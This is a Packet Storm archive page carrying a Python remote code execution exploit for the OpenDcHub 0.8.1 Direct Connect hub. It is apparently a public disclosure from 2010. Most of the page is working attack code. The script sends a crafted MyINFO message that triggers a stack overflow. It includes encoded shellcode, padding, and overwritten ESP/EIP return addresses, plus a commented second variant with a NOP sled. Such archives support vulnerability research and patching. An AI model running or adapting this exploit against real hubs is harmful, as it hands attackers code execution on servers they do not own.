exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OpenDcHub 0.8.1 Code Execution

OpenDcHub 0.8.1 Code Execution
Posted Apr 1, 2010
Authored by Pierre Nogues | Site indahax.com

OpenDcHub version 0.8.1 remote code execution exploit.

tags | exploit, remote, code execution
SHA-256 | 52bac409f84810190d80d37762eff34565f4eb33694b323fd7d5ea0083b1640b

OpenDcHub 0.8.1 Code Execution

Change Mirror Download
#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
# OpenDcHub is a direct connect hub for Linux
#
# OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
# OpenDcHub 0.8.1
#
# Plateforms :
# Unix
#
# Usage :
# ./exploit.py

import socket

host = '192.168.1.9'
port = 5000

# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24"
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d"
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75"
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x37\x51\x9c\x86\x6b\xfb\x0f\xc2"
shellcode+="\x83\x52\xe0\x9b\x45\x17\x6a\xfd\xdd\x55\xea\x58\x59\xbc"
shellcode+="\x5b\x65\xa8\xbf\xd5\xe0\xcb\x90\x8d\x3d\x03\x62\x26\x29"
shellcode+="\x74\xe6\xdf\xc7\x03\x05\x4f\x44\x9d\x2b\xc0\x61\x50\x2b"
shellcode+="\x2b"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")

hax="$MyINFO $ALL joseph "
hax+=shellcode
for i in range(103 - len(shellcode)):
hax+="A"
hax+="$"
hax+="\x20\x81\x81\x80" # esp
hax+="\xed\xf6\xfe\xbf" # eip
hax+="S:-1|"

s.send(hax)
s.close()

"""
# V2
# more complex version working too, it have more space for the shellcode

hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="\x20\x81\x81\x80" # esp
hax+="\x80\xf7\xfe\xbf" # eip
hax+="\xCC\xCC\xCC\xCC" # useless var
hax+="\x10\xf0\xfe\xbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+=shellcode
hax+="|"
"""
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close